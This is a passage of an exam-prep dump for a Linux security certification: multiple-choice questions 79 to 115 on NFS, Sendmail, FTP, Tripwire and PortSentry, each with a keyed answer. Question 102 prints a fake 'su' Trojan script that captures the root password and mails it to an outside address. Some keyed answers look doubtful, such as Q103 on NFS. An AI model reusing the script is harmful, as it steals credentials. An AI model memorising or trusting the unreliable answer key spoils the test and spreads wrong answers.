Answer: D
Page 19 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Question: 79
Joline is using the vigr command to edit a file on her Linux machine. Which of the following files is
this command used to edit?
A. /etc/passwd
B. /etc/sudoers
C. /etc/inetd.conf
D. /etc/group
Answer: D
Question: 80
Tonya, a Bash user, wants to automatically log out after 5 minutes of inactivity. She has added
the line "set autologout=5" to her .bashrc file. She notices that after 10 minutes of inactivity, she
still has not been logged out. Which of the following is most
likely the problem?
A. The autologout variable reads seconds, not minutes. The minimum is 60 seconds.
B. autologout has to be capitalized in the .bashrc file for it to take effect.
C. This line must be put in the .bash_profile file, not the .bashrc file.
D. In Bash the TMOUT variable must be set, not the autologout variable.
Answer: D
Question: 81
Which of the following are used to monitor log files and notify users of unusual logfile entries?
(Choose two.)
A. LogRotate
B. LogCheck
C. swatch
D. cron
E. Logwatch
Answer: B, C
Question: 82
Sam, a system administrator, is configuring a Kerberos Key Distribution Center (KDC) on a
Server . All of the Kerberos software is installed correctly on the clients and the Server . She now
wants to create a database to store all of the principal names and passwords. The name of her
local realm is LINUXSITE.ORG. Which of the following should Sam do to
accomplish this?
A. Include the line "LINUXSITE.ORG ={ master_database_type = des-cdb-crc }" in the kdc.conf
file.
B. Include the line "LINUXSITE.ORG = { kdc = kerberos.LINUXSITE.ORG:88}" in the krb5.conf
file.
C. Run the command "kinit --create -f [email protected]".
D. Run the command "kdb5_util create -r LINUXSITE.ORG -s".
Answer: D
Question: 83
Page 20 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A company has just installed Linux on a computer system. This computer will be used exclusively
as a mail Server , a Network File System (NFS) Server , and an Network Information Services
(NIS) Server . The system administrator wishes to secure the
Server by disabling all unnecessary daemons. Which of the following are unnecessary daemons
that should be disabled to better secure the Server ? (Choose three.)
A. nmbd
B. apmd
C. rpc.usersd
D. wu.ftpd
E. portmap
F. hypbind
Answer: A, B, D
Question: 84
Beth logs into a remote machine as shown below. Beth is most likely using which of the
following?
login: beth
otp-md5 469 kb63492
Response: HOW NOW BROWN COW TOO LATE
Last login: Fri May 19 11:57:48 from host1
A. Shadow passwords
B. One-time Password in Everything (OPIE)
C. GPG/PGP
D. A static password system
E. A Trojan horse
Answer: B
Question: 85
Blake, a system administrator, is using the LogCheck program to monitor log files on the machine
host1. He receives the e-mail below from LogCheck. Which of the following conclusions can be
made concerning the information in Blake's e-mail?
Security Violations
-------------May 20 11:34:13 host1 PAM_unix[26354]: authentication failure;
amp (uid=1003) -> root for su service
May 20 11:34:56 host1 su[26354]: pam_authenticate:
Authentication failure
Unusual System Events
---------------May 20 11:34:03 host1 sshd[26346]: Accepted password for amp from 192.168.1.100 port 988
May 20 11:34:03 host1 PAM_unix[26346]: (ssh) session opened for user amp by (uid=0)
May 20 11:34:13 host1 PAM_unix[26354]: authentication failure; amp (uid=1003) -> root for su
service
May 20 11:34:56 host1 su[26354]: pam_authenticate: Authentication failure
May 20 11:35:01 host1 su[26354]: - pts/3 amp-root
A. On May 20 at 11:34, the user amp successfully changed his UID to 0 on host1, but the PAM
authentication module was not loaded.
B. On May 20 at 11:34, the user amp tried to login to host1 but failed.
Page 21 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
C. The word "failure" could be in host1's logcheck.hacking file.
D. The word "amp" could be in host1's logcheck.ignore file.
Answer: C
Question: 86
Jake has the lines below in his tw.config file. Which of the following is TRUE concerning this file?
Assume Jake's machine has only two partitions: root (/) and swap.
@@define DEVSEARCH E+ins
@@define TMPSEARCH E+ugp
@@define LOGSEARCH L-i
/R
!/var
A. If a rootkit is placed in /usr/var, Tripwire will not catch it.
B. If a rootkit is placed in /opt/var, Tripwire will not catch it.
C. If a rootkit is placed in /etc/local/var, Tripwire will not catch it.
D. If a rootkit is placed in /var/log, Tripwire will not catch it.
Answer: D
Question: 87
Anne is a system administrator. She wants to be able to tell when an unauthorized user has
modified files on her system. Which of the following programs will allow Anne to do this?
A. Sysmon
B. SATAN
C. Tripwire
D. PortSentry
Answer: C
Question: 88
Ryan, a newly hired system administrator, wants to maximize security on all company Server s.
At Ryan's former job, many company Server s were cracked and Trojan horses were later found
scattered in numerous places on the systems. Which of the following tools is the most effective
method of determining whether a system program has been altered?
A. SATAN
B. Tripwire
C. CERTchk
D. PGP
Answer: B
Question: 89
An administrator has noticed several attempted attacks revolving around three different ports on a
system Server . He wants to monitor all activity on the specified ports and send a message to any
attacker attempting to enter the system. Which of the following would best accomplish this task?
A. PortSentry
B. portmon
C. nmap
D. Tripwire
Page 22 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
E. portmap
Answer: A
Question: 90
Paul thinks an attacker has been attempting to port scan his system. PortSentry is installed on
the machine, but Paul is unsure where to look for the information that PortSentry has gathered
about the attacker. Which of the following files contains
information about attempted attacks?
A. portsentry.log
B. /etc/security
C. /var/log/secure
D. portsentry.history
Answer: D
Question: 91
John runs Symons on his Server . He has been reading the Symons configuration file and is
unsure about the line below. Considering this line, which of the following is TRUE regarding
Symons’s behavior?
config errorsto $admin
A. In the event of an error, a message will be sent to the $admin address.
B. In the event of an error, Symons will restart itself.
C. The number of logged error messages is limited to the number set by the administrator
($admin).
D. All system errors will be logged in the $admin file.
Answer: A
Question: 92
An administrator would like to make the Symons statusfile available on the Web so she can check
Symons’s status from anywhere. Which of the following Symons configuration file entries will put
the statusfile in HTML form?
A. config statusfile html
B. config html /home/httpd/html/sysmon.html
C. config statusfile sysmon.html
D. config statusfile html /home/httpd/html/sysmon.html
Answer: D
Question: 93
Webmin provides an efficient Web interface for system maintenance and configuration of many
system services. Which of the following CANNOT be done through Webmin?
A. Configuring network interfaces, routes, hosts, and DNS
B. Modifying users and general options for WU-FTPD
C. Editing the kernel and changing what partitions are available at boot time
D. Changing the primary boot device
Answer: D
Page 23 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Question: 94
A certification authority distributes digital certificates that include important pieces of information,
such as the identity of the secure Server . Which of the following is NOT included in a digital
certificate?
A. The public key for that particular site
B. A digital signature validating the certificate
C. A list of operations that can be performed using the certificate
D. A list of the services available on the Server
Answer: D
Question: 95
A secure Server using SSL and digital certificates allows customers to pay for orders using their
credit cards over a secure channel. Upon validation by the Server , the clients receive the public
key. Which of the following is used by the client to initiate the secure connection, and how is it
obtained?
A. Private key; sent to the client by the Certification Authority
B. Private key; sent to the client by the Server
C. Session key; generated by the client based on the public key
D. Session key; generated by the Server based on the public key
Answer: C
Question: 96
You are a system administrator and want to be e-mailed immediately when an unauthorized user
has broken into your system. Which of the following programs best suits your needs?
A. Symons
B. Port Sentry
C. SATAN
D. Tripwire
Answer: B
Question: 97
Telnet poses several security risks when it is used across a protected network. Which of the
following is a security risk of Telnet?
A. It transmits data using weak encryption.
B. It transmits data in clear text.
C. It is susceptible to buffer overflow attacks.
D. It broadcasts the IP address of the originating host after passing through a firewall.
Answer: B
Question: 98
A system administrator wants to share the /share/downloads directory on his NFS Server s. In
order to do this he should add the line below to the ______ file.
/share/downloads *.localdomain(ro)
A. /etc/hosts.allow
B. /etc/host.conf
Page 24 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
C. /etc/fstab
D. /etc/exports
E. /etc/smb.conf
Answer: D
Question: 99
A potential security risk of NFS is a user logging onto the client as root. To minimize this threat,
NFS comes with which of the following features?
A. all_squash
B. root_squash
C. noaccess
D. rw="list of users"
E. anonuid=0, anongid=0
Answer: B
Question: 100
Sally, a system administrator, has properly configured an NFS Server (sunflower). There are four
other NFS clients on the LAN that utilize the NFS share on sunflower (sparrow, robin, redbird,
and bluebird). All services are running on standard ports. All four NFS clients are properly
configured to mount NFS partitions on sunflower with the exceptions below.
According to this information, which machine will be able to access the NFS shares on
sunflower?
--The /etc/hosts.deny file on sparrow contains the line "portmap:ALL".
--The /etc/exports file on robin contains the line "/ (noaccess)".
--Redbird cannot utilize Remote Procedure Calls.
--The nfsd and portmap daemons are not running on bluebird.
A. sparrow
B. robin
C. redbird
D. bluebird
Answer: B
Question: 101
As superuser, the system administrator types "echo $PATH" and sees the output below. Why is
this path considered to be a security risk for a superuser?
.:/usr/sbin:/bin:/usr/bin:/sbin:/usr/X11R6/bin
A. This would allow execution of files without the execute bit being set.
B. The superuser could accidentally execute a malicious program because the current working
directory is in the path.
C. The superuser could accidentally execute a malicious program because /sbin is in the path.
D. The dot allows the superuser to execute hidden system files in /.
Answer: B
Question: 102
Page 25 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Examine the code below. This code was saved in a file called "su" in the home directory of Tad,
who is a part-time system administrator. Tad has a path of "/home/tad:/bin:/usr/bin/". What will
happen when Tad types "su -" at the command prompt? (Assume that the true "su" is stored in
/bin.)
#!/bin/bash
echo -n Password:
read $PASS
echo . | mail [email protected] -s $1:$PASS
echo su: incorrect password
rm ./su
A. Tad will become superuser.
B. Tad will receive an error message stating that a Trojan horse has been detected.
C. Tad will receive a "permission denied" error message.
D. Tad will most likely give the root password to the unknown "user."
Answer: D
Question: 103
The major security problem with Network File System (NFS) is that an NFS Server and client
trust each other unless explicitly stated otherwise. Which of the following will restrict NFS access
to Server s?
A. Edit /etc/hosts.allow to only accept IPs that need to access portmapper.
B. Change permissions on the exported directories to 400.
C. Edit /etc/exports to include the line "/mnt/eris/local apollon(rw)".
D. Edit /etc/exports to include the line "/mnt/eris/local apollon(ro,no_root_squash)".
Answer: D
Question: 104
NIS+was developed in response to several security risks found in NIS. Which of the following is a
potential security risk when using NIS?
A.
B.
C.
D.
NIS relies on passwords in /etc/passwd that are viewable by users.
hosts.allow and hosts.deny are not used in conjunction with NIS.
Unencrypted queries and replies are passed across the network.
The NIS slave Server cannot be configured to disable an account after a specified number of
logins.
Answer: C
Question: 105
Although used on many systems to handle e-mail functions, Send mail poses a significant risk to
Linux and other Unix variants. Why?
A. Send mail appends its configuration file to handle multiple connections and types of
connections.
B. The Send mail daemon spawns child processes to handle multiple simultaneous requests,
which may cause a buffer overflow resulting in a root shell.
C. Send mail uses ports above 1024, which are exploitable by crackers.
D. Send mail sets the sticky bit on its directories, which grants all data, including worms
attached to e-mail, root permissions on the system.
E. Send mail must be run as root to perform many of its tasks.
Page 26 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Answer: E
Question: 106
Which of the following presents a potential security risk of Send mail?
A. Local users can flood Send mail with requests to flush the queue.
B. Send mail uses plain text to authenticate user passwords.
C. Send mail does not use ANSI standard, which will prevent Send mail from entering
debugging mode and granting root permissions when it receives unknown characters.
D. Send mail stores data in the swap until the data transmission is complete, which may cause a
buffer overflow on busy systems.
Answer: A
Question: 107
Patrick, the system administrator, is concerned about the security of Send mail and decides to
install smap. Which of the following best describes smap?
A. The Send mail daemon passes the request to smap, which parses the data against a table of
malicious programs and IP addresses known for originating such programs.
B. smap changes the permissions on all incoming data, which ensures that no attached program
has root privileges.
C. smap does not run as root or have access to anything outside the mail queue, so an attacker
will not be able to gain access outside the mail queue.
D. smap encrypts the data passing between machines by using a specified encryption algorithm
and passing public and private encryption keys to verify the host.
Answer: C
Question: 108
Additional security for IMAP can be provided by using which of the following?
A. RSA encryption in hosts.allow and hosts.deny
B. Secure Socket Layer (SSL) protocol for encryption of communications
C. PGP authentication to verify the origin of the e-mail
D. MD5 verification against the data field to detect the inclusion of malicious programs
Answer: B
Question: 109
In response to the risks associated with POP, APOP was developed to increase security. Which
of the following represents an added security feature of APOP?
A.
B.
C.
D.
It encrypts the password and login name.
All data is encapsulated using TCP Wrappers and delivered to the client.
The body of the message is sent after the client has been verified.
After the connection between Server and client is established, data is sent as one large file
instead of packets.
Answer: A
Question: 110
Although still one of the most widely used services on the Internet, anonymous FTP poses a
potential security threat. Why?
Page 27 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
A. The requested data is sent in IPX format.
B. If a security hole is found, it can be easily exploited.
C. The user gains a root shell when using an anonymous account.
D. The FTP Server administrator is not able to obtain the IP of the requesting machine.
Answer: B
Question: 111
An administrator wants to enable FTP on an as-needed basis and does not want the service to
load at system start-up. In order to do this, he should comment out the lines pertaining to FTP in
the __________ file. (Choose the best answer.)
A. /etc/sysctl.conf
B. /sbin/ident.conf
C. /etc/inetd.conf
D. /etc/inittab
E. /etc/ftpusers
Answer: C
Question: 112
After receiving an urgent request to make the files in the /download directory available to clients,
an administrator enters the sequence of commands below. Which of the following security risks
did the administrator create by doing this?
useradd ftp
mkdir /home/ftp
cp /downloads /home/ftp
A. FTP users will not have to provide a password. This prevents the administrator from tracking
who made the request.
B. The FTP user will belong to the default group (users) on the system, granting FTP users
access to those directories and files that the default group can access.
C. The FTP user is given the permissions of the files contained in the downloads directory. This
presents a security problem if one of those files was owned by root.
D. An FTP user is given read, write and execute permissions to all subdirectories in the /home
directory.
E. The administrator did not set the permissions of the FTP user to 755, thereby allowing FTP
users to view the files of other users.
Answer: B
Question: 113
Mary, a senior system administrator, is reviewing the work of a junior system administrator
assigned to setup an anonymous FTP Server . Mary notices the line below in the /etc/passwd file.
Which of the following represents the security risk imposed by this line?
ftp:*:700:700:Anonymous FTP:/home/ftp:/bin/bash
A. The anonymous FTP user is not presented with a password prompt.
B. The FTP Server is now vulnerable to a buffer overflow attack.
C. The space in the fifth field will cause an error and drop the user to a root shell.
D. An anonymous FTP user is given a shell from which he can execute uploaded programs.
Page 28 of 29
© SelfExamEngine.com
Exam Name:
Exam Type
Exam Code:
Linux Security, Privacy & Ethics (Level 1)
SAIR
3X0-104
Total Questions:
115
Answer: D
Question: 114
Which of the following is a characteristic of an effective security policy?
A. It states who is responsible for creating/updating new policy guidelines.
B. It states exactly what is being protected and why.
C. It states that the items at risk must be insured.
D. It states those behaviors that are seen as appropriate by the company.
Answer: B
Question: 115
The system administrator has discovered that his Server has been compromised. At a minimum,
the intruder has obtained a username, password, and the root password. Which of the following
will guarantee that the intruder has been removed from the system?
A. Reformat all partitions and reinstall the system.
B. Kill all existing processes and reboot.
C. Change the root password and place a lock on the account to which the intruder has obtained
access.
D. Force all users to change their passwords.
Answer: A
Page 29 of 29
© SelfExamEngine.com